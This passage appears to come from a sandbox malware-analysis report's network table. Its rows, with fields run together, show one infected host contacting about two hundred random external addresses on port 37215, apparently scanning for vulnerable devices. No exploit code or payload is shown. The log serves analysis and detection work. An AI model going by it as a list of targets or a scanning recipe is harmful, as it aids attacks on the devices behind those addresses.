                                                          4694192.168.2.1554584212.168.87.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4695192.168.2.155311641.54.116.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4696192.168.2.155245273.110.169.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4697192.168.2.1542866197.169.6.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4698192.168.2.155819694.29.117.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4699192.168.2.15449888.15.201.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4700192.168.2.1555840157.175.244.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4701192.168.2.155234041.114.158.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4702192.168.2.154283827.180.23.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4703192.168.2.1536200157.89.221.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4704192.168.2.155259241.67.34.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4705192.168.2.1551414197.10.17.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4706192.168.2.1546890157.208.138.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4707192.168.2.1552798157.89.229.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4708192.168.2.1541660157.49.190.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4709192.168.2.154490441.23.37.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4710192.168.2.1545044197.254.193.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4711192.168.2.154315241.27.225.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4712192.168.2.1549844108.0.10.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4713192.168.2.155223641.233.154.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4714192.168.2.153426041.235.254.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4715192.168.2.1552758154.86.163.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4716192.168.2.15538168.83.199.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4717192.168.2.1538356190.229.60.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4718192.168.2.1541974197.137.0.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4719192.168.2.1533464157.68.210.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4720192.168.2.1541968197.209.182.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4721192.168.2.154797441.67.76.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4722192.168.2.1537172157.150.85.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4723192.168.2.1552640197.133.125.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4724192.168.2.153718290.254.179.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4725192.168.2.1547718157.193.39.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4726192.168.2.1545770157.182.112.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4727192.168.2.1556744157.38.114.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4728192.168.2.1536418197.111.128.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4729192.168.2.1534944197.210.91.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4730192.168.2.1537960197.158.207.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4731192.168.2.1539332187.235.86.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4732192.168.2.1541568197.199.121.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4733192.168.2.155164441.255.16.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4734192.168.2.1533932197.74.62.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4735192.168.2.154254241.12.35.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4736192.168.2.154909497.2.54.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4737192.168.2.1550294197.184.248.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4738192.168.2.1551532157.154.102.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4739192.168.2.155234088.112.123.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4740192.168.2.153901041.180.15.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4741192.168.2.1560326122.156.169.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4742192.168.2.1551758169.53.140.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4743192.168.2.1547862157.195.97.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4744192.168.2.1547594157.209.80.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4745192.168.2.1547006157.231.25.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4746192.168.2.155133027.108.55.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4747192.168.2.154515841.179.52.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4748192.168.2.153817441.254.4.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4749192.168.2.1558450157.79.214.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4750192.168.2.154102241.191.127.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4751192.168.2.1547616197.171.151.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4752192.168.2.1543806197.122.189.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4753192.168.2.154277688.0.235.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4754192.168.2.1544956157.91.195.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4755192.168.2.1552388157.129.60.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4756192.168.2.155094224.46.35.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4757192.168.2.1560002159.193.215.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4758192.168.2.1553966157.47.135.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4759192.168.2.1559642157.21.153.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4760192.168.2.1534544157.106.208.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4761192.168.2.1558264157.98.15.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4762192.168.2.1552178157.213.127.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4763192.168.2.154877841.170.160.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4764192.168.2.155738841.95.62.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4765192.168.2.1545382157.5.5.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4766192.168.2.1536732157.43.115.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4767192.168.2.15462124.42.86.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4768192.168.2.155575241.115.97.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4769192.168.2.1538542157.35.251.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4770192.168.2.1546702197.104.70.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4771192.168.2.155496241.156.67.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4772192.168.2.1560590157.44.3.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4773192.168.2.1534694173.228.251.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4774192.168.2.1535548197.217.4.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4775192.168.2.1536836180.68.112.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4776192.168.2.153547641.55.6.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4777192.168.2.1542804197.145.174.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4778192.168.2.1534376157.145.221.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4779192.168.2.1560712197.134.200.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4780192.168.2.1543088197.177.57.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4781192.168.2.1558878197.88.247.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4782192.168.2.1552528102.224.107.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4783192.168.2.1558040197.207.73.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4784192.168.2.1553718166.168.6.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4785192.168.2.1539588110.159.162.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4786192.168.2.155206684.213.95.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4787192.168.2.154824641.234.93.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4788192.168.2.153937641.69.171.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4789192.168.2.1541510197.197.86.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4790192.168.2.153334059.75.21.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4791192.168.2.1536014197.61.53.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4792192.168.2.1534682197.151.84.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4793192.168.2.1546014162.194.90.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4794192.168.2.154781641.68.15.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4795192.168.2.1543598157.11.247.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4796192.168.2.1546344107.211.41.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4797192.168.2.155067641.162.82.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4798192.168.2.1539886197.162.105.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4799192.168.2.156093037.210.212.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4800192.168.2.1539650157.124.39.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4801192.168.2.155307841.222.50.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4802192.168.2.154676658.172.111.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4803192.168.2.153740841.30.100.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4804192.168.2.155790666.27.249.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4805192.168.2.153813852.88.230.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4806192.168.2.154066441.108.32.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4807192.168.2.156013441.33.175.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4808192.168.2.1552608170.34.125.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4809192.168.2.155756441.197.162.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4810192.168.2.1546742197.68.38.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4811192.168.2.1543114135.78.144.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4812192.168.2.155611441.22.61.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4813192.168.2.155517241.97.26.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4814192.168.2.1535194197.70.248.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4815192.168.2.1557468197.158.177.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4816192.168.2.154786041.200.195.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4817192.168.2.1553336157.175.221.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4818192.168.2.154386667.16.124.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4819192.168.2.1540458197.8.254.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4820192.168.2.1534188157.5.216.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4821192.168.2.156070041.39.115.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4822192.168.2.1540076157.173.136.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4823192.168.2.1534170100.19.70.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4824192.168.2.1536884169.83.168.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4825192.168.2.1556736197.5.2.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4826192.168.2.154441641.82.64.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4827192.168.2.1558548157.237.149.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4828192.168.2.1547092201.211.150.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4829192.168.2.1558416197.25.180.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4830192.168.2.1556118220.217.122.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4831192.168.2.156030463.197.107.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4832192.168.2.153701641.113.29.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4833192.168.2.1555236195.222.249.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4834192.168.2.153297441.133.241.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4835192.168.2.1543858192.183.188.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4836192.168.2.155511027.140.113.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4837192.168.2.1539904197.133.232.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4838192.168.2.153675698.108.165.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4839192.168.2.155774857.196.128.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4840192.168.2.1545160157.186.197.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4841192.168.2.1536066157.72.232.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4842192.168.2.1548076197.241.49.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4843192.168.2.1539246157.71.53.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4844192.168.2.1541652197.128.75.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4845192.168.2.153654241.229.0.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4846192.168.2.1543094157.122.145.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4847192.168.2.1534692197.19.105.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4848192.168.2.154742897.248.5.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4849192.168.2.1545674157.207.225.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4850192.168.2.1540516197.211.14.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4851192.168.2.155050441.11.229.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4852192.168.2.155483214.101.227.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4853192.168.2.1553606136.69.128.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4854192.168.2.1558034197.86.13.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4855192.168.2.154690241.223.157.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4856192.168.2.1560544197.45.182.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4857192.168.2.154936663.184.163.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4858192.168.2.153531062.254.228.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4859192.168.2.155298670.136.107.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4860192.168.2.1546612197.231.151.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4861192.168.2.154570241.24.167.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4862192.168.2.1538384157.243.229.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4863192.168.2.1546166197.49.142.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4864192.168.2.153739019.168.37.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4865192.168.2.1557512125.35.174.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4866192.168.2.155321084.52.236.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4867192.168.2.1558502197.198.32.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4868192.168.2.155996841.154.159.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4869192.168.2.1538962197.109.15.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4870192.168.2.155996050.23.94.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4871192.168.2.1556310197.195.158.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4872192.168.2.1555388157.217.227.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4873192.168.2.1535168157.250.105.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4874192.168.2.154312841.116.223.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4875192.168.2.1542168157.37.34.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4876192.168.2.1548834157.151.7.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4877192.168.2.1546798197.216.145.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4878192.168.2.1548222157.245.0.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4879192.168.2.154853041.109.192.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4880192.168.2.1560156157.62.34.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4881192.168.2.155767841.248.98.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4882192.168.2.1551126197.236.124.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4883192.168.2.1545998197.142.165.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4884192.168.2.1560544197.33.52.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4885192.168.2.155527477.204.251.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4886192.168.2.1542744157.196.126.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4887192.168.2.155791682.227.202.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4888192.168.2.1547112197.141.240.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4889192.168.2.1560274157.125.138.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4890192.168.2.1540714157.37.53.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4891192.168.2.153978241.255.215.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4892192.168.2.154792641.163.251.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4893192.168.2.1543798169.234.107.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4894192.168.2.1551472197.159.217.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4895192.168.2.1546394197.71.37.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4896192.168.2.1540834103.101.211.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4897192.168.2.155757641.57.233.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4898192.168.2.1554872157.157.47.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4899192.168.2.1552908197.198.87.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4900192.168.2.1542780197.131.108.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4901192.168.2.1539180157.5.235.21237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4902192.168.2.153704241.213.217.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4903192.168.2.1550304157.27.20.10637215
